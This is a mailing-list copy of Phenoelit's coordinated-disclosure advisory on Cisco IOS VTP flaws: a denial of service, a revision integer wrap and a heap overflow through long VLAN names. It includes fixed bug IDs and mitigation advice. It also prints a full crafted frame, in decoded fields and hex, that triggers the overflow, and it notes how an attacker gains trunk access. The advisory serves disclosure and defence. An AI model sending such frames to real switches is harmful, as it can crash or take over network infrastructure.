<<< Date Index >>>     <<< Thread Index >>>

Cisco IOS VTP issues



Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +---+>

[ Title ]
        Cisco Systems IOS VTP multiple vulnerabilities

[ Authors ]
        FX              <fx@xxxxxxxxxxxx>

        Phenoelit Group (http://www.phenoelit.de)
        Advisory        http://www.phenoelit.de/stuff/CiscoVTP.txt

[ Affected Products ]
        Cisco IOS and CatOS

        Tested on:      C3550 IOS 12.1(19)

        Cisco Bug ID:   CSCei54611
        CERT Vu ID:     <not assinged>

[ Vendor communication ]
        06.07.05        Initial Notification, gaus@xxxxxxxxx
        12.07.05        PSIRT member Wendy Garvin <wgarvin@xxxxxxxxx>
                        took over
        14.07.05        Wendy states the there is a fix for one of the 
                        issues
        19.07.05        According to Wendy, Cisco has trouble reproducing
                        the issues and finding the affected code
        27.07.05        Wendy notifies FX about fixed code
        12.09.06        Phenoelit advisory goes to Cisco (FX just forgot 
                        about it, too much to hack, too little time, but the 
                        PSIRT party in Vegas was a good reminder)
        13.09.06        Final advisory going public as coordinated release

[ Overview ]
        Cisco Systems IOS contains bugs when handling the VLAN
        Trunking Protocol (VTP). Specially crafted packets may cause Denial of
        Service conditions, confusion of the network operator and a heap
        overflow with the possibility for arbitrary code execution.

[ Description ]
        Cisco IOS suffers from several bugs in the VTP handling code. All
        issues require VTP to be in server or client mode. Transparent mode
        (default) is not affected.

        Issue 1: Denial of Service
        When sending a VTP version 1 summary frame to a Cisco IOS device 
        and setting the VTP version field to value 2, the device stops
        working. Apparently, the VTP handling process will loop and is
        terminated by the systems watchdog process, reloading the device.

        Issue 2: Integer wrap in VTP revision
        If an attacker can send VTP updates (summary and sub) to a Cisco IOS
        or CatOS device, he can choose the revision of the VTP information. 
        A revision of 0x7FFFFFFF will be accepted by IOS. When the switchs 
        VLAN configuration is changed by an operator, IOS increases the 
        revision, which becomes 0x80000000 and seems to be internally 
        tracked by a signed integer variable. The revision is therefore 
        seen as large negative value. From this point in time on, the switch 
        will not be able to communicate changed VLAN configurations, since 
        the generated updates will be rejected by all other switches.

        Issue 3: VLAN name heap overflow
        If an attacker can send VTP updates to a Cisco IOS device, the 
        type 2 frames contain records for each individual VLAN in the update.
        One field of the VTP records contains the name of the VLAN, another
        field the length of this name. Sending an update with VLAN name 
        above 100 bytes and correctly reflecting the length in the VLAN
        name length field causes a heap overflow. The overflow can be 
        exploited to execute arbitrary code on the receiving switch. The 
        maximum length of a VLAN name in VTP is 255 bytes.

[ Example ]
        The following is an example frame for issue 3. The appropriate VTP
        summary advertisement (type 1) must be sent before this frame.

        IEEE 802.3 Ethernet 
            Destination: CDP/VTP (01:00:0c:cc:cc:cc)
            Source: <any>
            Length: 260
        Logical-Link Control
        Virtual Trunking Protocol
            Version: 0x01
            Code: Subset-Advert (0x02)
            Sequence Number: 1
            Management Domain Length: 5
            Management Domain: AAAAA
            Configuration Revision Number: 3
            VLAN Information
                VLAN Information Length: 212
                Status: 0x00
                VLAN Type: Ethernet (0x01)
                VLAN Name Length: 200
                ISL VLAN ID: 0x0001
                MTU Size: 1500
                802.10 Index: 0x000186a1
                VLAN Name: AAAAA[...]AAAAAA (200 in total)
        
        0000  01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa   ...........^....
        0010  03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00   .... .....AAAAA.
        0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
        0030  00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00   ................
        0040  01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41   ..........AAAAAA
        0050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00a0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00b0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00c0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00d0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00e0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00f0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0100  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0110  41 41                                             AA

[ Notes ]
        The VTP management domain is needed for the summary advertisement
        to be correct. This information is distributed via CDP if enabled.

        The attacker has to be on a trunk port for VTP frames to be 
        accepted. The Dynamic Trunk Protocol (DTP) can be used to become 
        a trunking peer.

[ Solution ]
        Cisco Systems provides fixed software, which can be found based on
        the following bug IDs:
        CSCsd52629/CSCsd34759 -- VTP version field DoS
        CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
        CSCsd34855/CSCei54611 -- Buffer Overflow in VTP VLAN name

        In general, it is recommended to configure a shared VTP password, 
        which will be used in an MD5 hash to protect the summary 
        advertisement.

[ end of file ($Revision: 1.1 $) ]

-- 
         FX           <fx@xxxxxxxxxxxx>
      Phenoelit   (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564